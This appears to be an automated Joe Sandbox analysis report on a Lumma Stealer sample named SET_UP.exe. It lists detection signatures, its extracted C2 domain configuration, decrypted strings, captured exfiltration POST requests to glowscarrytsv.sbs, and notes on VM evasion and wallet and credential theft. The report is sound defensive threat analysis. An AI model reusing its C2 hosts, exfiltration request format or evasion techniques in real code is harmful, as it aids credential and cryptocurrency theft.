Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SET_UP.exe

Overview

General Information

Sample name:SET_UP.exe
Analysis ID:1584813
MD5:5b0bafdddbc54bcbc57b87dfb94d0c64
SHA1:80f9e34f49784e7d097ea9cdf3989133a688c726
SHA256:cedea9aa30ea6ae6d36937321225d8ad2d8e2ff21412ef2254817b0da028ed71
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SET_UP.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\SET_UP.exe" MD5: 5B0BAFDDDBC54BCBC57B87DFB94D0C64)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tirepublicerj.shop", "framekgirus.shop", "cloudewahsj.shop", "nearycrepso.shop", "noisycuttej.shop", "abruptyopsn.shop", "rabidcowse.shop", "wholersorie.shop", "glowscarrytsv.sbs"], "Build id": "hRjzG3--ELVIRA"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x531b3:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        00000000.00000003.1807281482.0000000000A69000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1792533320.0000000000A37000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: SET_UP.exe PID: 7620JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Click to see the 3 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:15:08.513880+010020283713Unknown Traffic192.168.2.449748188.114.97.3443TCP
              2025-01-06T15:15:09.515438+010020283713Unknown Traffic192.168.2.449749188.114.97.3443TCP
              2025-01-06T15:15:10.634900+010020283713Unknown Traffic192.168.2.449750188.114.97.3443TCP
              2025-01-06T15:15:12.133029+010020283713Unknown Traffic192.168.2.449751188.114.97.3443TCP
              2025-01-06T15:15:13.372746+010020283713Unknown Traffic192.168.2.449752188.114.97.3443TCP
              2025-01-06T15:15:14.676572+010020283713Unknown Traffic192.168.2.449753188.114.97.3443TCP
              2025-01-06T15:15:16.067101+010020283713Unknown Traffic192.168.2.449754188.114.97.3443TCP
              2025-01-06T15:15:23.991606+010020283713Unknown Traffic192.168.2.449756188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:15:09.034284+010020546531A Network Trojan was detected192.168.2.449748188.114.97.3443TCP
              2025-01-06T15:15:10.005978+010020546531A Network Trojan was detected192.168.2.449749188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:15:09.034284+010020498361A Network Trojan was detected192.168.2.449748188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:15:10.005978+010020498121A Network Trojan was detected192.168.2.449749188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T15:15:15.492390+010020480941Malware Command and Control Activity Detected192.168.2.449753188.114.97.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://glowscarrytsv.sbs/apiAvira URL Cloud: Label: malware
              Found malware configuration
              Source: SET_UP.exe.7620.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "framekgirus.shop", "cloudewahsj.shop", "nearycrepso.shop", "noisycuttej.shop", "abruptyopsn.shop", "rabidcowse.shop", "wholersorie.shop", "glowscarrytsv.sbs"], "Build id": "hRjzG3--ELVIRA"}
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: glowscarrytsv.sbs
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--ELVIRA
              Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_0097C0FC
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_00981026
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_00981024
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 53585096h0_2_0097A045
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebp, dword ptr [esp+24h]0_2_00967008
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_0097D066
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-49h]0_2_0097C196
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0096E146
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4Fh]0_2_0099416B
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edi, dword ptr [0044E7C0h]0_2_009602C6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebx, bx0_2_009792F7
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+54h]0_2_009812F6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [ebp+00h]0_2_00954216
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, eax0_2_00957386
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebp, eax0_2_00957386
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, edx0_2_0095E3DE
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, word ptr [ecx]0_2_009663F6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_00992326
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx+3215B430h]0_2_00981406
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_00981406
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_009686BD
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [eax], cx0_2_009726C6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_0097D6CD
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then not eax0_2_00967625
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0096D62C
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+01h]0_2_00996656
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh0_2_00996656
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_0097D640
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h0_2_00966786
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [ebp+00h], cx0_2_0097C7A6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-38B0D97Ch]0_2_00982718
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov eax, ecx0_2_00977735
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_0097A896
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+3AF4CF65h]0_2_0098083D
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+3AF4CF65h]0_2_00980837
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00982863
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0098B9A6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movsx edx, byte ptr [esi+eax]0_2_009709E6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, ebx0_2_00973A26
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp eax0_2_00978A56
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_0097FA56
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then test esi, esi0_2_0098FA66
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ecx, eax0_2_0096ABFA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then add ecx, 03h0_2_0097CBEA
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp ecx0_2_0097DB0A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov dword ptr [esp], eax0_2_00967C0E
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00995C06
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h0_2_00995C06
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then lea eax, dword ptr [esp+48h]0_2_00979D15
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then jmp eax0_2_00978D8D
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, byte ptr [esi+ebx]0_2_00976DA4
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00981DAB
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h0_2_00966DC1
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00980DEF
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edx, eax0_2_0096CD52
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-13E2C4EAh]0_2_0096CD52
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_0096DD71
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00958EE6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00958EE6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0095FE46
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov edi, edx0_2_0098FFB5
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0097DF06

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49748 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49749 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49753 -> 188.114.97.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: glowscarrytsv.sbs
              Source: global trafficTCP traffic: 192.168.2.4:62246 -> 162.159.36.2:53
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: glowscarrytsv.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: glowscarrytsv.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TT526WWK16ZIQGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18140Host: glowscarrytsv.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8KZNW321KQR41UQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8767Host: glowscarrytsv.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LH89NZCPPT358FSVRSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20438Host: glowscarrytsv.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RAO4YOWPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 916Host: glowscarrytsv.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SZ2TPF9HTZ8ABB2DKFXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1112Host: glowscarrytsv.sbs
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: glowscarrytsv.sbs
              Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: glowscarrytsv.sbs
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: SET_UP.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro8
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: SET_UP.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: SET_UP.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: SET_UP.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: SET_UP.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: SET_UP.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: SET_UP.exeString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: SET_UP.exeString found in binary or memory: http://s2.symcb.com0
              Source: SET_UP.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: SET_UP.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: SET_UP.exeString found in binary or memory: http://sf.symcd.com0&
              Source: SET_UP.exeString found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: SET_UP.exeString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: SET_UP.exeString found in binary or memory: http://sv.symcd.com0&
              Source: SET_UP.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: SET_UP.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: SET_UP.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: SET_UP.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: SET_UP.exeString found in binary or memory: http://www.symauth.com/rpa00
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: SET_UP.exe, 00000000.00000003.1793319091.00000000036F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: SET_UP.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: SET_UP.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
